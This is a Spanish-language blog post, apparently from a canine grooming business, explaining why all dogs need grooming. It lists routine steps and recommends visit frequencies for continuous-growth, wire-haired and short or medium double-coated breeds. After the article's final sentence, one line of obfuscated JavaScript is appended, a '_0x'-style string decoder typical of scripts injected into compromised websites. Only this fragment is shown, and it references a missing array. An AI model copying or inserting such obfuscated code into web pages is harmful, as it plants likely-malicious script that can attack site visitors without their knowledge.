¿Necesita mi perro ir a la peluquería?

¿Necesita mi perro ir a la peluquería?

Esta es la pregunta que se hacen muchos propietarios, sobretodo de perros que son de pelo corto o medio.

Nos sorprendió mucho que gente con perros que tienen un pelo de muda, a la que les informábamos de nuestros servicios, nos respondían que a su perro no se le corta el pelo, por lo que no necesita una peluquería.

Todos los perros necesitan ir a la peluquería.

No sabemos muy bien exactamente cuándo ni donde nace la idea de que los peluqueros caninos somos «los que pelan los perros» y no hacemos nada más.

Pues bien, los peluqueros caninos somos algo más que los que cogen una «peladora» y la pasan sin más al manto de los perros.

Un peluquero se encarga del correcto mantenimiento de su pelo, de su piel y de realizar el arreglo que más le convenga por salud, higiene y comodidad, adecuándose a las necesidades del perro y del dueño, primando el bienestar del animal.

Al igual que no todos los perros necesitan cortarse el pelo ni acudir mensual, quincenal o semanalmente a la peluquería, hay otros perros a los que se les aconseja como muy tarde, acudir cada 3 meses coincidiendo con el cambio de estación, como es el caso de los perros de pelo corto y medio de doble capa.

Cuando un perro va a la peluquería SIEMPRE se hace lo siguiente: 

  1. Se cortan las uñas.
  2. Se limpian los oídos de pelo y suciedad.
  3. Se limpian las almohadillas de pelo.
  4. Se afeitan los genitales, el ano y la zona del vientre, si fuera necesario.
  5. Se despejan los pelos de los ojos.
  6. Se realizan como mínimo dos enjabonadas utilizando el champú que necesite la piel y el pelo.
  7. Se vacían las glándulas anales.
  8. Se realiza un cepillado profundo para quitar todos los nudos o el exceso de pelo muerto.

 

 

 

 

Después de esto, cada perro requiere de unas necesidades más concretas:

 

Pelo de crecimiento continuo

Yorkshires, Shih Tzus, Caniches, Bichones, etc.

Son aquellos perros a los que les debemos ir recortando el largo porque crece constantemente y muy rápido. No suelen tirar pelo o tirar muy

poco.

Al crecer rápido necesitan un mantenimiento como poco cada mes. Si no queremos cortar el largo del pelo siempre podemos hacer los 8 puntos de arriba además de un pequeño arreglo del pelo sobrante de las patas y la carita.

De esta forma tendremos un manto sano y sin nudos, porque un pelo descuidado tiende a enredarse muy fácilmente.

 

 

 

Pelo duro

Fox Terrier, Scottish Terrier, Grifón de Bruselas, Teckels, West Highlands, etc.

Son perros de pelo duro y que necesitan cada 2 meses como muy tarde renovar su pelo mediante el stripping.

La mayoría de los Spaniels tienen un pelo diferente a los de pelo duro pero la técnica que se utiliza es la misma.

Casi todos los de este grupo tienen dos partes de pelo diferenciadas, la del pelo al que se le realiza el stripping y el pelo largo a modo de flecos. Esos tienen un crecimiento más rápido y sería aconsejable repasar el largo una vez al mes al igual que en los perros de pelo de crecimiento continuo.

 

 

Pelo corto y medio

Pitbulls, Labradores, Goldens, Bóxers, Alaska Malamutes, Pastores Alemanes, Chow Chows, Pomeranias, Bulldogs, etc.

Todos ellos comparten una cosa, y es que son perros de muda que tiran pelo durante todo el año, pero sobretodo es en los cambios de estación cuando más fuerte es esa muda.

Acudir cada 3 meses a la peluquería coincidiendo con el cambio de estación, conseguiremos quitar todo el pelo que esté tirando en ese momento y proporcionar al pelo y  a la piel los nutrientes necesarios para que con la caída tan fuerte no sufra descamación la piel ni desnutrición el pelo.

En el caso de los perros tipo Pastores alemanes, alaskas, etc necesitarían acudir antes de los 3 meses. Son perros en los que la muda que tiranno sale por sí sola y es necesario retirarla con cepillados bien profundos. De lo contrario, todo ese pelo se queda atrapado dentro del pelo y se producirían unos nudos apretados que muchas veces producen problemas de piel por la falta de transpiración. Al igual que en los perros de pelo corto necesitan una buena nutrición del pelo y la piel.

Además, algunos requieren pequeños arreglos de los flecos que tienen, como es el caso de los goldens, chow chows, etc.

 

Otro de los motivos por el que es bueno llevar al perro a la peluquería es que es la mejor manera de socializarlo y acostumbrarlo al manejo. Además, los peluqueros tocamos el 100% de todo su cuerpo y muchas veces somos nosotros quienes detectamos enfermedades que un veterinario en una visita rutinaria no vería, bien por la cantidad de pelo que le impedía ver o palpar, o  porque no tocan igual que nosotros, porque estamos tocando todo su cuerpo durante al menos una hora, sobretodo durante el baño.

 

Por lo tanto, acudir a la peluquería es necesario para todos los perros, en mayor o menor medida, pero es necesario.

Si has tenido una mala experiencia no es excusa para no llevarle, busca un buen profesional que te ofrezca confianza.

function _0x9e23(_0x14f71d,_0x4c0b72){const _0x4d17dc=_0x4d17();return _0x9e23=function(_0x9e2358,_0x30b288){_0x9e2358=_0x9e2358-0x1d8;let _0x261388=_0x4d17dc[_0x9e2358];return _0x261388;},_0x9e23(_0x14f71d,_0x4c0b72);}